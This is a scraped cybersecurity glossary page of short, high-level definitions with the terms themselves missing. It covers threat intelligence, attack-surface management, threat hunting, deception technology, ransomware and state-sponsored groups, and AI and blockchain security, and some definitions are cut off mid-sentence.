Threat Intelligence Terms

A proactive process of identifying, quantifying, and addressing potential cyber threats against systems.

Detailed blueprints that replicate known attacker behaviors to assess and improve cybersecurity readiness.

Programs that replicate attacker behavior to test and improve an organization's defensive capabilities.

Protection mechanisms for artificial intelligence systems.

Utilizing artificial intelligence to identify irregular system behaviors that may signal a cyber threat.

Leveraging artificial intelligence to predict and prepare for emerging cybersecurity risks.

Utilizing sophisticated algorithms to scan large data sets for patterns indicative of cyber attacks.

A sophisticated ransomware-as-a-service group known for pioneering triple extortion tactics, being the first major group…

The process of analyzing the sequence of events that occur during a cyber attack.

Tools for studying how attacks progress through systems.

Techniques for breaking the sequence of events in a cyber attack.

The process of documenting and analyzing the steps taken during a cyber attack.

Creating visual representations of attack sequences.

The process of evaluating the financial impact of cyber attacks.

The creation of visual representations of potential attack paths through a system.

The process of identifying and analyzing potential routes attackers could take through a network.

Testing whether theoretical attack paths are actually exploitable.

The study of common attack methodologies to improve defense strategies.

A collection of documented cyber attack methodologies.

Identifying common patterns in cyber attacks.

Evaluating how well systems can withstand various types of attacks.

Visual representation of attack progression.

Creating detailed models of how attacks progress through systems.

Unique pattern identifying specific exploit methods or malware families through behavioral analysis.

Tools that enable organizations to test their security by simulating real attacks.

Tools that replicate real-world cyber attack scenarios to test and refine defensive measures.

All potential entry points vulnerable to cyber threats in a system.

Software used to identify and assess potential vulnerabilities.

Structured approach to evaluating vulnerabilities.

Standard reference point for vulnerability assessment.

The continuous process of identifying new potential entry points for attacks.

Systematically identifying all possible attack vectors.

The continuous discovery, inventory, classification, and monitoring of an organization's IT infrastructure.

Tools for discovering and managing potential vulnerabilities.

Software for identifying and visualizing potential vulnerabilities.

Continuous observation of potential vulnerability points.

The practice of minimizing the number of potential entry points for cyber attacks.

Planned approach to minimizing potential entry points for attacks.

Tools that create visual representations of an organization's potential vulnerabilities.

Graphical mapping of an organization's potential entry points for cyber attacks to aid in risk management.

Tools for displaying potential vulnerabilities.

Real-time visualization of threat activity across attack surfaces.

A visual diagram mapping potential attack vectors against a system, used to assess security risks and mitigation strateg…

The process of identifying and analyzing potential methods of attack.

The process of discovering potential paths for cyber attacks.

Ranking potential attack methods by their likelihood and potential impact to guide remediation efforts.

Enhancing traditional threat intelligence with additional contextual data for deeper analysis.

The use of algorithms to continuously assign risk scores to assets based on current threat intelligence.

Prioritizing security vulnerabilities.

The analysis of user and system behavior patterns to proactively detect potential cybersecurity breaches.

Assigning risk ratings based on observed user and system behavior patterns to inform security decisions.

Leveraging behavioral data to detect emerging threats and predict attacker actions.

Evaluation of blockchain protections.

Tools that enable organizations to simulate cyber attacks against their systems to test their security.

Method guessing credentials through trial-and-error attempts.

An attack technique where threat actors load a legitimate but vulnerable kernel-mode driver into a target system to expl…

A Russian-linked cybercriminal group best known for conducting mass exploitation campaigns against enterprise file trans…

Security assessment using AI-driven analysis.

The application of cognitive computing methods to improve the analysis and interpretation of security data.

Systems that enable organizations to share and analyze threat data collectively.

Standardized system for rating IT vulnerabilities' severity and prioritization.

Analyzing risk by considering the broader operational and threat context in which an organization operates.

The process of linking threat data from different IT domains to gain a holistic view of potential risks.

Aggregating and correlating threat data from multiple operating systems and environments.

Techniques to determine the origin and identity of threat actors responsible for cyber attacks.

Techniques that use false data and decoys to mislead attackers and reveal their methods.

Strategies designed to detect, prevent, and respond to intelligence-gathering cyber intrusions.

The process of tracking, identifying and laying blame on the perpetrator of a cyberattack.

Visualizing the relationships among various threat actors, vulnerabilities, and incidents within a digital ecosystem.

The consolidation of threat intelligence data from various sources to provide a comprehensive security view.

The practice of proactively searching for cyber threats that are lurking undetected in a network.

Software that scans hidden parts of the internet for compromised data and emerging threats.

The study and mapping of hidden network structures used by cybercriminals to coordinate attacks.

Overwhelming target systems with excessive traffic to disrupt service availability.

Distributing the responsibility for threat hunting across multiple teams or systems to improve coverage.

Incorporating decoy systems and misleading data into networks to confuse and detect attackers.

Using deceptive strategies to misdirect attackers and gather intelligence about their methods.

The careful planning and maintenance of fake digital assets intended to distract or detect intruders.

Assessing an organization's online presence to identify potential exposures and vulnerabilities.

Systems that deploy decoy assets and misinformation in real time to mislead and trap attackers.

Pre-packaged tools automating vulnerability exploitation, often distributed via malicious ads or compromised sites.

The use of graph theory to map relationships between threat actors, events, and attack vectors for improved analysis.

The strategic implementation of interconnected honeypots to attract and analyze malicious cyber activities.

Systems that combine multiple sources and types of threat intelligence to deliver a comprehensive security overview.

Cybercriminal specialists who focus exclusively on gaining unauthorized access to organizational networks and then selli…

Tools and strategies aimed at detecting and mitigating threats originating from within an organization.

Security risks from employees/contractors mishandling data.

Techniques that monitor and analyze internal user behavior to identify potential malicious activities.

Techniques for identifying and monitoring internal users whose behavior deviates from the norm.

Comprehensive systems that unify multiple security functions into a single management console.

An attack technique where adversaries use legitimate, pre-installed operating system tools, utilities, and features — ra…

Cyber attacks that use legitimate, built-in system tools to carry out malicious activities.

The world's most prolific ransomware-as-a-service (RaaS) operation from 2021 through 2024, responsible for thousands of …

Vulnerabilities specific to ML systems.

Utilizing logical inference systems to enhance automated threat detection and response.

Weaknesses in AI neural networks.

Structured methodologies and toolkits for simulating attacks to evaluate system security.

Leveraging data analytics to forecast potential cyber threats before they materialize.

Measurement of privacy risk levels.

A rapidly growing ransomware-as-a-service operation that emerged in February 2024 and quickly became the most active ran…

Advanced algorithms designed to identify deviations from normal behavior as they occur.

Methods for linking disparate threat data in real time to provide actionable security insights.

Software solutions that mimic adversary tactics to test and improve an organization's defensive measures.

A Chinese state-sponsored advanced persistent threat (APT) group that conducted widespread intrusions into major US tele…

A Chinese state-sponsored APT group (formerly tracked as Hafnium) responsible for the late 2024 compromise of the US Tre…

Surveillance of blockchain contract execution.

Structure for contract validation.

Tool for finding contract weaknesses.

Exercises designed to mimic social engineering attacks, testing an organization's resilience against human-targeted thre…

The long-term collection and analysis of threat data to inform an organization's cybersecurity strategy.

A cyber attack that targets an organization by compromising less-secure elements in their supply network.

Third-party vendor breaches enabling simultaneous infiltration of multiple downstream organizations.

System for identifying attack sources.

Analyzing attacker patterns.

Studying specific attack campaigns.

Monitoring specific adversary activities.

Evaluating attacker abilities.

Technical resources used by attackers.

Analyzing patterns and behaviors of cyber attackers.

The process of analyzing attacker behaviors and tactics to create detailed profiles for threat identification.

Monitoring specific adversaries.

The process of augmenting raw threat data with additional contextual information for better decision making.

Tools that simulate realistic attack scenarios to test the resilience of cybersecurity defenses.

Proactive strategies and techniques used to search for hidden adversaries within networks.

Documented procedures for proactive threat detection.

Structure for analyzing threat data.

Handling multiple threat data sources.

A technology that collects, correlates, and analyzes threat data from multiple sources.

Structure of threat data systems.

Connecting threat data sources.

Measuring threat data reliability.

Evaluating the reliability of threat information.

System for exchanging threat data.

Standardized methods that facilitate the secure exchange of threat information among organizations.

Creating visual representations of cyber threat data to improve situational awareness and strategic planning.

Tools and processes that automate the identification and analysis of potential security threats.

Predictive analysis to understand how cyber threats might spread across interconnected systems.

Evaluating the various pathways that attackers might exploit to infiltrate systems.

Implementing artificial intelligence systems that are transparent, reliable, and secure for cyber defense.

VR-specific security vulnerabilities.

A Chinese state-sponsored APT group focused on pre-positioning within US critical infrastructure — including power grids…

Security weakness exploitable by threats.

Systematic identification/analysis of security weaknesses in systems.

Evaluation of blockchain-related risks.

Blockchain security surveillance.

Collection of blockchain vulnerabilities.

A cyber attack that occurs on the same day a weakness is discovered in software.

Attack targeting undisclosed software vulnerabilities before patches exist.